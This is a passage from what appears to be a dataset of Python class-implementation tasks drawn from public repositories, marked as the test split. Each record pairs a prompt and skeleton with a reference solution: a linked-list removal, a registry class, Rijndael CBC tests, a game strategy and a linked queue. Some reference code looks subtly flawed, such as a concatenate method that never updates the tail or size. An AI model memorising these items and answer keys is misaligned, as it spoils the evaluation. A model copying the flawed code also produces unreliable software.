solution\"\"\"\n <|body_0|>\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"One pass solution, maintaining an (n + 1) gap b/w two pointers\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"Two pass solution\"\"\"\n dummy = ListNode(0)\n dummy.next = head\n curr = head\n position = 0\n while curr:\n position += 1\n curr = curr.next\n position -= n\n curr = dummy\n while position > 0:\n position -= 1\n curr = curr.next\n curr.next = curr.next.next\n return dummy.next\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"One pass solution, maintaining an (n + 1) gap b/w two pointers\"\"\"\n dummy = ListNode(0)\n dummy.next = head\n first = dummy\n second = dummy\n for i in range(n + 1):\n first = first.next\n while first:\n first = first.next\n second = second.next\n second.next = second.next.next\n return dummy.next\n", "source": "the_stack_v2_python_sparse", "source_path": "Remove Nth Node From End of List.py", "source_repo": "aulee888/LeetCode", "split": "test", "star_events_count": 0} {"blob_id": "f64bcd3dbd53b90534bb61bf076b87d7a2ff7e93", "bodies": ["def deco(fn):\n \"\"\"Decorate the function.\"\"\"\n if isinstance(prim, 
str):\n self[prim] = fn\n elif issubclass(prim, Primitive):\n self[id(prim)] = fn\n return fn\nreturn deco", "fn = default\nif isinstance(prim_obj, str) and prim_obj in self:\n fn = self[prim_obj]\nelif isinstance(prim_obj, Primitive):\n key = id(prim_obj.__class__)\n if key in self:\n fn = self[key]\n else:\n key = prim_obj.name\n if key in self:\n fn = self[prim_obj.name]\nreturn fn"], "bodies_text": "<|body_start_0|>\n def deco(fn):\n \"\"\"Decorate the function.\"\"\"\n if isinstance(prim, str):\n self[prim] = fn\n elif issubclass(prim, Primitive):\n self[id(prim)] = fn\n return fn\n return deco\n<|end_body_0|>\n\n<|body_start_1|>\n fn = default\n if isinstance(prim_obj, str) and prim_obj in self:\n fn = self[prim_obj]\n elif isinstance(prim_obj, Primitive):\n key = id(prim_obj.__class__)\n if key in self:\n fn = self[key]\n else:\n key = prim_obj.name\n if key in self:\n fn = self[prim_obj.name]\n return fn\n<|end_body_1|>\n", "class_docstring": "Registry class for registry functions for grad and vm_impl on Primitive.", "class_name": "Registry", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-proprietary-license", "MPL-1.0", "OpenSSL", "LGPL-3.0-only", "LicenseRef-scancode-warranty-disclaimer", "BSD-3-Clause-Open-MPI", "MIT", "MPL-2.0-no-copyleft-exception", "NTP", "BSD-3-Clause", "GPL-1.0-or-later", "0BSD", "MPL-2.0", "LicenseRef-scancode-free-unknown", "AGPL-3.0-only", "Libpng", "MPL-1.1", "IJG", "GPL-2.0-only", "BSL-1.0", "Zlib", "LicenseRef-scancode-public-domain", "LicenseRef-scancode-python-cwi", "BSD-2-Clause", "LicenseRef-scancode-gary-s-brown", "LGPL-2.1-only", "LicenseRef-scancode-other-permissive", "Python-2.0", "LicenseRef-scancode-mit-nagy", "LicenseRef-scancode-other-copyleft", "LicenseRef-scancode-unknown-license-reference", "Unlicense"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Registry:\n \"\"\"Registry class for registry functions for grad and vm_impl on Primitive.\"\"\"\n\n def register(self, prim):\n \"\"\"register the function.\"\"\"\n <|body_0|>\n\n def get(self, prim_obj, default):\n \"\"\"Get the value by primitive.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def deco(fn):\n \"\"\"Decorate the function.\"\"\"\n if isinstance(prim, str):\n self[prim] = fn\n elif issubclass(prim, Primitive):\n self[id(prim)] = fn\n return fn\n return deco\n<|end_body_0|>\n\n<|body_start_1|>\n fn = default\n if isinstance(prim_obj, str) and prim_obj in self:\n fn = self[prim_obj]\n elif isinstance(prim_obj, Primitive):\n key = id(prim_obj.__class__)\n if key in self:\n fn = self[key]\n else:\n key = prim_obj.name\n if key in self:\n fn = self[prim_obj.name]\n return fn\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000126", "length_bytes": 2358, "license_type": "permissive", "methods": [{"docstring": "register the function.", "name": "register", "signature": "def register(self, prim)"}, {"docstring": "Get the value by primitive.", "name": "get", "signature": "def get(self, prim_obj, default)"}], "n_methods": 2, "prompt": "Implement the Python class `Registry` described below.\n\nClass description:\nRegistry class for registry functions for grad and vm_impl on Primitive.\n\nMethod signatures and docstrings:\n- def register(self, prim): register the function.\n- def get(self, prim_obj, default): Get the value by primitive.", "prompted_full_text": "Implement the Python class `Registry` described below.\n\nClass description:\nRegistry class for registry functions for grad and vm_impl on 
Primitive.\n\nMethod signatures and docstrings:\n- def register(self, prim): register the function.\n- def get(self, prim_obj, default): Get the value by primitive.\n\n<|skeleton|>\nclass Registry:\n \"\"\"Registry class for registry functions for grad and vm_impl on Primitive.\"\"\"\n\n def register(self, prim):\n \"\"\"register the function.\"\"\"\n <|body_0|>\n\n def get(self, prim_obj, default):\n \"\"\"Get the value by primitive.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def deco(fn):\n \"\"\"Decorate the function.\"\"\"\n if isinstance(prim, str):\n self[prim] = fn\n elif issubclass(prim, Primitive):\n self[id(prim)] = fn\n return fn\n return deco\n<|end_body_0|>\n\n<|body_start_1|>\n fn = default\n if isinstance(prim_obj, str) and prim_obj in self:\n fn = self[prim_obj]\n elif isinstance(prim_obj, Primitive):\n key = id(prim_obj.__class__)\n if key in self:\n fn = self[key]\n else:\n key = prim_obj.name\n if key in self:\n fn = self[prim_obj.name]\n return fn\n<|end_body_1|>\n", "revision_id": "54acb15d435533c815ee1bd9f6dc0b56b4d4cf83", "skeleton": "<|skeleton|>\nclass Registry:\n \"\"\"Registry class for registry functions for grad and vm_impl on Primitive.\"\"\"\n\n def register(self, prim):\n \"\"\"register the function.\"\"\"\n <|body_0|>\n\n def get(self, prim_obj, default):\n \"\"\"Get the value by primitive.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Registry:\n \"\"\"Registry class for registry functions for grad and vm_impl on Primitive.\"\"\"\n\n def register(self, prim):\n \"\"\"register the function.\"\"\"\n def deco(fn):\n \"\"\"Decorate the function.\"\"\"\n if isinstance(prim, str):\n self[prim] = fn\n elif issubclass(prim, Primitive):\n self[id(prim)] = fn\n return fn\n return deco\n\n def get(self, prim_obj, default):\n \"\"\"Get the value by primitive.\"\"\"\n fn = default\n if isinstance(prim_obj, str) and prim_obj in self:\n fn = self[prim_obj]\n elif isinstance(prim_obj, Primitive):\n key = id(prim_obj.__class__)\n if key in self:\n fn = self[key]\n else:\n key = prim_obj.name\n if key in self:\n fn = self[prim_obj.name]\n return fn\n", "source": "the_stack_v2_python_sparse", "source_path": "mindspore/python/mindspore/ops/_register_for_op.py", "source_repo": "mindspore-ai/mindspore", "split": "test", "star_events_count": 4178} {"blob_id": "79642d78bdfc4b8895089edb0cd6edcda84ff165", "bodies": ["key = '2b7e151628aed2a6abf7158809cf4f3c'\niv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\npt = '6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e51\\n 30c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710'\nkey, iv, pt = (a2b_p(key), a2b_p(iv), a2b_p(pt))\nalg = CBC(Rijndael(key, blockSize=32))\nct = alg.encrypt(pt, iv=iv)\nself.assertEqual(alg.decrypt(iv + ct), pt)", "key = '2b7e151628aed2a6abf7158809cf4f3c'\niv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\nkey, iv = (a2b_p(key), a2b_p(iv))\nalg = CBC(Rijndael(key, blockSize=32))\nfor i in range(100):\n pt = i * 'a'\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)"], "bodies_text": "<|body_start_0|>\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n pt = '6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e51\\n 30c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710'\n key, iv, pt = (a2b_p(key), 
a2b_p(iv), a2b_p(pt))\n alg = CBC(Rijndael(key, blockSize=32))\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n<|end_body_0|>\n\n<|body_start_1|>\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n key, iv = (a2b_p(key), a2b_p(iv))\n alg = CBC(Rijndael(key, blockSize=32))\n for i in range(100):\n pt = i * 'a'\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n<|end_body_1|>\n", "class_docstring": "CBC test with Rijndael", "class_name": "CBC_Rijndael_Test", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CBC_Rijndael_Test:\n \"\"\"CBC test with Rijndael\"\"\"\n\n def testCBC_Rijndael_256(self):\n \"\"\"Rijndael CBC 256\"\"\"\n <|body_0|>\n\n def testCBC_Rijndael_variable_data(self):\n \"\"\"Rijndael CBC 256\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n pt = '6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e51\\n 30c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710'\n key, iv, pt = (a2b_p(key), a2b_p(iv), a2b_p(pt))\n alg = CBC(Rijndael(key, blockSize=32))\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n<|end_body_0|>\n\n<|body_start_1|>\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n key, iv = (a2b_p(key), a2b_p(iv))\n alg = CBC(Rijndael(key, blockSize=32))\n for i in range(100):\n pt = i * 'a'\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000127", "length_bytes": 5430, "license_type": "permissive", "methods": [{"docstring": "Rijndael CBC 256", "name": "testCBC_Rijndael_256", "signature": "def testCBC_Rijndael_256(self)"}, {"docstring": "Rijndael CBC 256", "name": "testCBC_Rijndael_variable_data", "signature": "def testCBC_Rijndael_variable_data(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001259", "prompt": "Implement the Python class `CBC_Rijndael_Test` described below.\n\nClass description:\nCBC test with Rijndael\n\nMethod signatures and docstrings:\n- def testCBC_Rijndael_256(self): Rijndael CBC 256\n- def testCBC_Rijndael_variable_data(self): Rijndael CBC 256", "prompted_full_text": "Implement the Python class `CBC_Rijndael_Test` described below.\n\nClass description:\nCBC test with Rijndael\n\nMethod signatures and docstrings:\n- def testCBC_Rijndael_256(self): Rijndael CBC 256\n- def testCBC_Rijndael_variable_data(self): Rijndael CBC 256\n\n<|skeleton|>\nclass CBC_Rijndael_Test:\n \"\"\"CBC test with Rijndael\"\"\"\n\n def testCBC_Rijndael_256(self):\n \"\"\"Rijndael CBC 256\"\"\"\n <|body_0|>\n\n def testCBC_Rijndael_variable_data(self):\n \"\"\"Rijndael CBC 256\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n pt = '6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e51\\n 30c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710'\n key, iv, pt = (a2b_p(key), a2b_p(iv), a2b_p(pt))\n alg = CBC(Rijndael(key, blockSize=32))\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n<|end_body_0|>\n\n<|body_start_1|>\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = 
'000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n key, iv = (a2b_p(key), a2b_p(iv))\n alg = CBC(Rijndael(key, blockSize=32))\n for i in range(100):\n pt = i * 'a'\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n<|end_body_1|>\n", "revision_id": "ed4d80d1e6f09634c12c0c3096e39667c6642b95", "skeleton": "<|skeleton|>\nclass CBC_Rijndael_Test:\n \"\"\"CBC test with Rijndael\"\"\"\n\n def testCBC_Rijndael_256(self):\n \"\"\"Rijndael CBC 256\"\"\"\n <|body_0|>\n\n def testCBC_Rijndael_variable_data(self):\n \"\"\"Rijndael CBC 256\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CBC_Rijndael_Test:\n \"\"\"CBC test with Rijndael\"\"\"\n\n def testCBC_Rijndael_256(self):\n \"\"\"Rijndael CBC 256\"\"\"\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n pt = '6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e51\\n 30c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710'\n key, iv, pt = (a2b_p(key), a2b_p(iv), a2b_p(pt))\n alg = CBC(Rijndael(key, blockSize=32))\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n\n def testCBC_Rijndael_variable_data(self):\n \"\"\"Rijndael CBC 256\"\"\"\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n key, iv = (a2b_p(key), a2b_p(iv))\n alg = CBC(Rijndael(key, blockSize=32))\n for i in range(100):\n pt = i * 'a'\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n", "source": "the_stack_v2_python_sparse", "source_path": "script.module.cryptolib/lib/cryptopy/cipher/cbc_test.py", "source_repo": "gacj22/WizardGacj22", "split": "test", "star_events_count": 4} {"blob_id": "8fb919f2a151a8a579f812aecd079f6dab826d28", "bodies": ["super(Punisher, self).__init__()\nself.mem_length = 1\nself.grudged = False\nself.grudge_memory = 1", "if self.grudge_memory >= self.mem_length:\n self.grudge_memory = 0\n self.grudged = False\nif self.grudged:\n self.grudge_memory += 1\n return 'D'\nelif 'D' in opponent.history[-1:]:\n self.mem_length = opponent.defections * 20 // len(opponent.history)\n self.grudged = True\n return 'D'\nreturn 'C'", "Player.reset(self)\nself.grudged = False\nself.grudge_memory = 0\nself.mem_length = 1"], "bodies_text": "<|body_start_0|>\n super(Punisher, self).__init__()\n self.mem_length = 1\n self.grudged = False\n self.grudge_memory = 1\n<|end_body_0|>\n\n<|body_start_1|>\n if self.grudge_memory >= self.mem_length:\n self.grudge_memory = 0\n self.grudged = False\n if self.grudged:\n self.grudge_memory += 1\n return 'D'\n elif 'D' in opponent.history[-1:]:\n self.mem_length = opponent.defections * 20 // len(opponent.history)\n self.grudged = True\n return 'D'\n return 'C'\n<|end_body_1|>\n\n<|body_start_2|>\n Player.reset(self)\n self.grudged = False\n self.grudge_memory = 0\n self.mem_length = 1\n<|end_body_2|>\n", "class_docstring": "A player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.", "class_name": "Punisher", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Punisher:\n \"\"\"A player starts by cooperating however 
will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.\"\"\"\n\n def __init__(self):\n \"\"\"Initialised the player\"\"\"\n <|body_0|>\n\n def strategy(self, opponent):\n \"\"\"Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D\"\"\"\n <|body_1|>\n\n def reset(self):\n \"\"\"Resets scores and history\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Punisher, self).__init__()\n self.mem_length = 1\n self.grudged = False\n self.grudge_memory = 1\n<|end_body_0|>\n\n<|body_start_1|>\n if self.grudge_memory >= self.mem_length:\n self.grudge_memory = 0\n self.grudged = False\n if self.grudged:\n self.grudge_memory += 1\n return 'D'\n elif 'D' in opponent.history[-1:]:\n self.mem_length = opponent.defections * 20 // len(opponent.history)\n self.grudged = True\n return 'D'\n return 'C'\n<|end_body_1|>\n\n<|body_start_2|>\n Player.reset(self)\n self.grudged = False\n self.grudge_memory = 0\n self.mem_length = 1\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000128", "length_bytes": 3311, "license_type": "permissive", "methods": [{"docstring": "Initialised the player", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D", "name": "strategy", "signature": "def strategy(self, opponent)"}, {"docstring": "Resets scores and history", "name": "reset", "signature": "def reset(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007273", "prompt": "Implement the Python class `Punisher` described below.\n\nClass description:\nA player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.\n\nMethod signatures and docstrings:\n- def __init__(self): Initialised the player\n- def strategy(self, opponent): Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D\n- def reset(self): Resets scores and history", "prompted_full_text": "Implement the Python class `Punisher` described below.\n\nClass description:\nA player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.\n\nMethod signatures and docstrings:\n- def __init__(self): Initialised the player\n- def strategy(self, opponent): Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D\n- def reset(self): Resets scores and history\n\n<|skeleton|>\nclass Punisher:\n \"\"\"A player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.\"\"\"\n\n def __init__(self):\n \"\"\"Initialised the 
player\"\"\"\n <|body_0|>\n\n def strategy(self, opponent):\n \"\"\"Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D\"\"\"\n <|body_1|>\n\n def reset(self):\n \"\"\"Resets scores and history\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Punisher, self).__init__()\n self.mem_length = 1\n self.grudged = False\n self.grudge_memory = 1\n<|end_body_0|>\n\n<|body_start_1|>\n if self.grudge_memory >= self.mem_length:\n self.grudge_memory = 0\n self.grudged = False\n if self.grudged:\n self.grudge_memory += 1\n return 'D'\n elif 'D' in opponent.history[-1:]:\n self.mem_length = opponent.defections * 20 // len(opponent.history)\n self.grudged = True\n return 'D'\n return 'C'\n<|end_body_1|>\n\n<|body_start_2|>\n Player.reset(self)\n self.grudged = False\n self.grudge_memory = 0\n self.mem_length = 1\n<|end_body_2|>\n", "revision_id": "0ce3aa29eb239b9a9055cd7bebb627602851b65a", "skeleton": "<|skeleton|>\nclass Punisher:\n \"\"\"A player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.\"\"\"\n\n def __init__(self):\n \"\"\"Initialised the player\"\"\"\n <|body_0|>\n\n def strategy(self, opponent):\n \"\"\"Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D\"\"\"\n <|body_1|>\n\n def reset(self):\n \"\"\"Resets scores and history\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Punisher:\n \"\"\"A player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.\"\"\"\n\n def __init__(self):\n \"\"\"Initialised the player\"\"\"\n super(Punisher, self).__init__()\n self.mem_length = 1\n self.grudged = False\n self.grudge_memory = 1\n\n def strategy(self, opponent):\n \"\"\"Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D\"\"\"\n if self.grudge_memory >= self.mem_length:\n self.grudge_memory = 0\n self.grudged = False\n if self.grudged:\n self.grudge_memory += 1\n return 'D'\n elif 'D' in opponent.history[-1:]:\n self.mem_length = opponent.defections * 20 // len(opponent.history)\n self.grudged = True\n return 'D'\n return 'C'\n\n def reset(self):\n \"\"\"Resets scores and history\"\"\"\n Player.reset(self)\n self.grudged = False\n self.grudge_memory = 0\n self.mem_length = 1\n", "source": "the_stack_v2_python_sparse", "source_path": "axelrod/strategies/punisher.py", "source_repo": "jamesbroadhead/Axelrod", "split": "test", "star_events_count": 1} {"blob_id": "3938f6d9f1d809225cd2a9e0722e6a46f20fea77", "bodies": ["if self.is_empty():\n raise Empty('Queue is empty')\nreturn self._head._element", "if self.is_empty():\n raise Empty('Queue is empty')\nanswer = self._head._element\nself._head = self._head._next\nself._size -= 1\nif self.is_empty():\n self._tail = None\nreturn answer", "newest = self._Node(element, None)\nif self.is_empty():\n self._head = newest\nelse:\n 
self._tail._next = newest\nself._tail = newest\nself._size += 1", "if not self.is_empty():\n head = self._head\n self._head = head._next\n head._next = None\n self._tail._next = head\n self._tail = head", "assert isinstance(Q, LinkedQueue)\nif self.is_empty():\n self._head = Q._head\nelse:\n self._tail._next = Q._head\nQ._head = None"], "bodies_text": "<|body_start_0|>\n if self.is_empty():\n raise Empty('Queue is empty')\n return self._head._element\n<|end_body_0|>\n\n<|body_start_1|>\n if self.is_empty():\n raise Empty('Queue is empty')\n answer = self._head._element\n self._head = self._head._next\n self._size -= 1\n if self.is_empty():\n self._tail = None\n return answer\n<|end_body_1|>\n\n<|body_start_2|>\n newest = self._Node(element, None)\n if self.is_empty():\n self._head = newest\n else:\n self._tail._next = newest\n self._tail = newest\n self._size += 1\n<|end_body_2|>\n\n<|body_start_3|>\n if not self.is_empty():\n head = self._head\n self._head = head._next\n head._next = None\n self._tail._next = head\n self._tail = head\n<|end_body_3|>\n\n<|body_start_4|>\n assert isinstance(Q, LinkedQueue)\n if self.is_empty():\n self._head = Q._head\n else:\n self._tail._next = Q._head\n Q._head = None\n<|end_body_4|>\n", "class_docstring": "FIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front", "class_name": "LinkedQueue", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LinkedQueue:\n \"\"\"FIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front\"\"\"\n\n def first(self):\n \"\"\"return __but do not remove__ the element at the front of the queue :return:\"\"\"\n <|body_0|>\n\n def dequeue(self):\n \"\"\"remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:\"\"\"\n <|body_1|>\n\n def enqueue(self, element):\n \"\"\"add an element to the back of queue :param element: :return:\"\"\"\n <|body_2|>\n\n def rotate(self):\n \"\"\"rotate front element to the back of the queue :return:\"\"\"\n <|body_3|>\n\n def concatenate(self, Q):\n \"\"\"takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. 
run in O(1) result in Q being an empty queue :param Q: :return:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.is_empty():\n raise Empty('Queue is empty')\n return self._head._element\n<|end_body_0|>\n\n<|body_start_1|>\n if self.is_empty():\n raise Empty('Queue is empty')\n answer = self._head._element\n self._head = self._head._next\n self._size -= 1\n if self.is_empty():\n self._tail = None\n return answer\n<|end_body_1|>\n\n<|body_start_2|>\n newest = self._Node(element, None)\n if self.is_empty():\n self._head = newest\n else:\n self._tail._next = newest\n self._tail = newest\n self._size += 1\n<|end_body_2|>\n\n<|body_start_3|>\n if not self.is_empty():\n head = self._head\n self._head = head._next\n head._next = None\n self._tail._next = head\n self._tail = head\n<|end_body_3|>\n\n<|body_start_4|>\n assert isinstance(Q, LinkedQueue)\n if self.is_empty():\n self._head = Q._head\n else:\n self._tail._next = Q._head\n Q._head = None\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000129", "length_bytes": 4149, "license_type": "no_license", "methods": [{"docstring": "return __but do not remove__ the element at the front of the queue :return:", "name": "first", "signature": "def first(self)"}, {"docstring": "remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:", "name": "dequeue", "signature": "def dequeue(self)"}, {"docstring": "add an element to the back of queue :param element: :return:", "name": "enqueue", "signature": "def enqueue(self, element)"}, {"docstring": "rotate front element to the back of the queue :return:", "name": "rotate", "signature": "def rotate(self)"}, {"docstring": "takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. run in O(1) result in Q being an empty queue :param Q: :return:", "name": "concatenate", "signature": "def concatenate(self, Q)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_006095", "prompt": "Implement the Python class `LinkedQueue` described below.\n\nClass description:\nFIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front\n\nMethod signatures and docstrings:\n- def first(self): return __but do not remove__ the element at the front of the queue :return:\n- def dequeue(self): remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:\n- def enqueue(self, element): add an element to the back of queue :param element: :return:\n- def rotate(self): rotate front element to the back of the queue :return:\n- def concatenate(self, Q): takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. 
run in O(1) result in Q being an empty queue :param Q: :return:", "prompted_full_text": "Implement the Python class `LinkedQueue` described below.\n\nClass description:\nFIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front\n\nMethod signatures and docstrings:\n- def first(self): return __but do not remove__ the element at the front of the queue :return:\n- def dequeue(self): remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:\n- def enqueue(self, element): add an element to the back of queue :param element: :return:\n- def rotate(self): rotate front element to the back of the queue :return:\n- def concatenate(self, Q): takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. run in O(1) result in Q being an empty queue :param Q: :return:\n\n<|skeleton|>\nclass LinkedQueue:\n \"\"\"FIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front\"\"\"\n\n def first(self):\n \"\"\"return __but do not remove__ the element at the front of the queue :return:\"\"\"\n <|body_0|>\n\n def dequeue(self):\n \"\"\"remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:\"\"\"\n <|body_1|>\n\n def enqueue(self, element):\n \"\"\"add an element to the back of queue :param element: :return:\"\"\"\n <|body_2|>\n\n def rotate(self):\n \"\"\"rotate front element to the back of the queue :return:\"\"\"\n <|body_3|>\n\n def concatenate(self, Q):\n \"\"\"takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. 
run in O(1) result in Q being an empty queue :param Q: :return:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.is_empty():\n raise Empty('Queue is empty')\n return self._head._element\n<|end_body_0|>\n\n<|body_start_1|>\n if self.is_empty():\n raise Empty('Queue is empty')\n answer = self._head._element\n self._head = self._head._next\n self._size -= 1\n if self.is_empty():\n self._tail = None\n return answer\n<|end_body_1|>\n\n<|body_start_2|>\n newest = self._Node(element, None)\n if self.is_empty():\n self._head = newest\n else:\n self._tail._next = newest\n self._tail = newest\n self._size += 1\n<|end_body_2|>\n\n<|body_start_3|>\n if not self.is_empty():\n head = self._head\n self._head = head._next\n head._next = None\n self._tail._next = head\n self._tail = head\n<|end_body_3|>\n\n<|body_start_4|>\n assert isinstance(Q, LinkedQueue)\n if self.is_empty():\n self._head = Q._head\n else:\n self._tail._next = Q._head\n Q._head = None\n<|end_body_4|>\n", "revision_id": "f79b08021cebbfe0ff32abcc8e9dd56af32e4aad", "skeleton": "<|skeleton|>\nclass LinkedQueue:\n \"\"\"FIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front\"\"\"\n\n def first(self):\n \"\"\"return __but do not remove__ the element at the front of the queue :return:\"\"\"\n <|body_0|>\n\n def dequeue(self):\n \"\"\"remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:\"\"\"\n <|body_1|>\n\n def enqueue(self, element):\n \"\"\"add an element to the back of queue :param element: :return:\"\"\"\n <|body_2|>\n\n def rotate(self):\n \"\"\"rotate front element to the back of the queue 